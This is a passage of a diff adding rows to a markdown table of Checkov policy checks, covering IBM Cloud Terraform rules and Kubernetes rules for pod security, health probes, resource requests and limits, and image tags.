+| 2666 | CKV2_IBM_1               | resource                         | ibm_is_lb                                                                                        | Ensure load balancer for VPC is private (disable public access)                                                                                                                                          | Terraform               | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml)                                                         |
+| 2667 | CKV2_IBM_2               | resource                         | ibm_is_vpc                                                                                       | Ensure VPC classic access is disabled                                                                                                                                                                    | Terraform               | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml)                                                           |
+| 2668 | CKV2_IBM_3               | resource                         | ibm_iam_account_settings                                                                         | Ensure API key creation is restricted in account settings                                                                                                                                                | Terraform               | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml)                                 |
+| 2669 | CKV2_IBM_4               | resource                         | ibm_iam_account_settings                                                                         | Ensure Multi-Factor Authentication (MFA) is enabled at the account level                                                                                                                                 | Terraform               | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml)                                                                 |
+| 2670 | CKV2_IBM_5               | resource                         | ibm_iam_account_settings                                                                         | Ensure Service ID creation is restricted in account settings                                                                                                                                             | Terraform               | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml)                           |
+| 2671 | CKV2_IBM_7               | resource                         | ibm_container_cluster                                                                            | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint                                                                                                              | Terraform               | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml)                                       |
+| 2672 | CKV_K8S_1                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Kubernetes              | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py)                                                                                                |
+| 2673 | CKV_K8S_1                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py)                                                                                          |
+| 2674 | CKV_K8S_2                | resource                         | PodSecurityPolicy                                                                                | Do not admit privileged containers                                                                                                                                                                       | Kubernetes              | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py)                                                                                |
+| 2675 | CKV_K8S_2                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py)                                                                            |
+| 2676 | CKV_K8S_3                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Kubernetes              | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py)                                                                                                |
+| 2677 | CKV_K8S_3                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py)                                                                                          |
+| 2678 | CKV_K8S_4                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Kubernetes              | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py)                                                                    |
+| 2679 | CKV_K8S_4                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py)                                                              |
+| 2680 | CKV_K8S_5                | resource                         | PodSecurityPolicy                                                                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py)                                                                        |
+| 2681 | CKV_K8S_5                | resource                         | kubernetes_pod_security_policy                                                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py)                                                                  |
+| 2682 | CKV_K8S_6                | resource                         | PodSecurityPolicy                                                                                | Do not admit root containers                                                                                                                                                                             | Kubernetes              | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py)                                                                                            |
+| 2683 | CKV_K8S_6                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit root containers                                                                                                                                                                             | Terraform               | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py)                                                                                        |
+| 2684 | CKV_K8S_7                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Kubernetes              | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py)                                                                                        |
+| 2685 | CKV_K8S_7                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Terraform               | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py)                                                                                  |
+| 2686 | CKV_K8S_8                | resource                         | DaemonSet                                                                                        | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2687 | CKV_K8S_8                | resource                         | Deployment                                                                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2688 | CKV_K8S_8                | resource                         | DeploymentConfig                                                                                 | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2689 | CKV_K8S_8                | resource                         | Pod                                                                                              | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2690 | CKV_K8S_8                | resource                         | PodTemplate                                                                                      | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2691 | CKV_K8S_8                | resource                         | ReplicaSet                                                                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2692 | CKV_K8S_8                | resource                         | ReplicationController                                                                            | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2693 | CKV_K8S_8                | resource                         | StatefulSet                                                                                      | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                                    |
+| 2694 | CKV_K8S_8                | resource                         | kubernetes_deployment                                                                            | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 2695 | CKV_K8S_8                | resource                         | kubernetes_deployment_v1                                                                         | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 2696 | CKV_K8S_8                | resource                         | kubernetes_pod                                                                                   | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 2697 | CKV_K8S_8                | resource                         | kubernetes_pod_v1                                                                                | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 2698 | CKV_K8S_9                | resource                         | DaemonSet                                                                                        | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2699 | CKV_K8S_9                | resource                         | Deployment                                                                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2700 | CKV_K8S_9                | resource                         | DeploymentConfig                                                                                 | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2701 | CKV_K8S_9                | resource                         | Pod                                                                                              | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2702 | CKV_K8S_9                | resource                         | PodTemplate                                                                                      | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2703 | CKV_K8S_9                | resource                         | ReplicaSet                                                                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2704 | CKV_K8S_9                | resource                         | ReplicationController                                                                            | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2705 | CKV_K8S_9                | resource                         | StatefulSet                                                                                      | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                                  |
+| 2706 | CKV_K8S_9                | resource                         | kubernetes_deployment                                                                            | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 2707 | CKV_K8S_9                | resource                         | kubernetes_deployment_v1                                                                         | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 2708 | CKV_K8S_9                | resource                         | kubernetes_pod                                                                                   | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 2709 | CKV_K8S_9                | resource                         | kubernetes_pod_v1                                                                                | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 2710 | CKV_K8S_10               | resource                         | CronJob                                                                                          | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2711 | CKV_K8S_10               | resource                         | DaemonSet                                                                                        | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2712 | CKV_K8S_10               | resource                         | Deployment                                                                                       | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2713 | CKV_K8S_10               | resource                         | DeploymentConfig                                                                                 | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2714 | CKV_K8S_10               | resource                         | Job                                                                                              | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2715 | CKV_K8S_10               | resource                         | Pod                                                                                              | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2716 | CKV_K8S_10               | resource                         | PodTemplate                                                                                      | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2717 | CKV_K8S_10               | resource                         | ReplicaSet                                                                                       | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2718 | CKV_K8S_10               | resource                         | ReplicationController                                                                            | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2719 | CKV_K8S_10               | resource                         | StatefulSet                                                                                      | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                        |
+| 2720 | CKV_K8S_10               | resource                         | kubernetes_deployment                                                                            | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 2721 | CKV_K8S_10               | resource                         | kubernetes_deployment_v1                                                                         | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 2722 | CKV_K8S_10               | resource                         | kubernetes_pod                                                                                   | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 2723 | CKV_K8S_10               | resource                         | kubernetes_pod_v1                                                                                | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 2724 | CKV_K8S_11               | resource                         | CronJob                                                                                          | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2725 | CKV_K8S_11               | resource                         | DaemonSet                                                                                        | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2726 | CKV_K8S_11               | resource                         | Deployment                                                                                       | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2727 | CKV_K8S_11               | resource                         | DeploymentConfig                                                                                 | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2728 | CKV_K8S_11               | resource                         | Job                                                                                              | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2729 | CKV_K8S_11               | resource                         | Pod                                                                                              | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2730 | CKV_K8S_11               | resource                         | PodTemplate                                                                                      | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2731 | CKV_K8S_11               | resource                         | ReplicaSet                                                                                       | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2732 | CKV_K8S_11               | resource                         | ReplicationController                                                                            | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2733 | CKV_K8S_11               | resource                         | StatefulSet                                                                                      | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                            |
+| 2734 | CKV_K8S_11               | resource                         | kubernetes_deployment                                                                            | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 2735 | CKV_K8S_11               | resource                         | kubernetes_deployment_v1                                                                         | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 2736 | CKV_K8S_11               | resource                         | kubernetes_pod                                                                                   | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 2737 | CKV_K8S_11               | resource                         | kubernetes_pod_v1                                                                                | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 2738 | CKV_K8S_12               | resource                         | CronJob                                                                                          | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2739 | CKV_K8S_12               | resource                         | DaemonSet                                                                                        | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2740 | CKV_K8S_12               | resource                         | Deployment                                                                                       | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2741 | CKV_K8S_12               | resource                         | DeploymentConfig                                                                                 | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2742 | CKV_K8S_12               | resource                         | Job                                                                                              | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2743 | CKV_K8S_12               | resource                         | Pod                                                                                              | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2744 | CKV_K8S_12               | resource                         | PodTemplate                                                                                      | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2745 | CKV_K8S_12               | resource                         | ReplicaSet                                                                                       | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2746 | CKV_K8S_12               | resource                         | ReplicationController                                                                            | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2747 | CKV_K8S_12               | resource                         | StatefulSet                                                                                      | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                                  |
+| 2748 | CKV_K8S_12               | resource                         | kubernetes_deployment                                                                            | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 2749 | CKV_K8S_12               | resource                         | kubernetes_deployment_v1                                                                         | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 2750 | CKV_K8S_12               | resource                         | kubernetes_pod                                                                                   | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 2751 | CKV_K8S_12               | resource                         | kubernetes_pod_v1                                                                                | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 2752 | CKV_K8S_13               | resource                         | CronJob                                                                                          | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2753 | CKV_K8S_13               | resource                         | DaemonSet                                                                                        | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2754 | CKV_K8S_13               | resource                         | Deployment                                                                                       | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2755 | CKV_K8S_13               | resource                         | DeploymentConfig                                                                                 | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2756 | CKV_K8S_13               | resource                         | Job                                                                                              | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2757 | CKV_K8S_13               | resource                         | Pod                                                                                              | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2758 | CKV_K8S_13               | resource                         | PodTemplate                                                                                      | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2759 | CKV_K8S_13               | resource                         | ReplicaSet                                                                                       | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2760 | CKV_K8S_13               | resource                         | ReplicationController                                                                            | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2761 | CKV_K8S_13               | resource                         | StatefulSet                                                                                      | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                                      |
+| 2762 | CKV_K8S_13               | resource                         | kubernetes_deployment                                                                            | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 2763 | CKV_K8S_13               | resource                         | kubernetes_deployment_v1                                                                         | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 2764 | CKV_K8S_13               | resource                         | kubernetes_pod                                                                                   | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 2765 | CKV_K8S_13               | resource                         | kubernetes_pod_v1                                                                                | Memory requests should be set                                                                                                                                                                            | Terraform               | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 2766 | CKV_K8S_14               | resource                         | CronJob                                                                                          | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2767 | CKV_K8S_14               | resource                         | DaemonSet                                                                                        | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2768 | CKV_K8S_14               | resource                         | Deployment                                                                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2769 | CKV_K8S_14               | resource                         | DeploymentConfig                                                                                 | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
+| 2770 | CKV_K8S_14               | resource                         | Job                                                                                              | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Kubernetes              | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py)                                                                                                    |
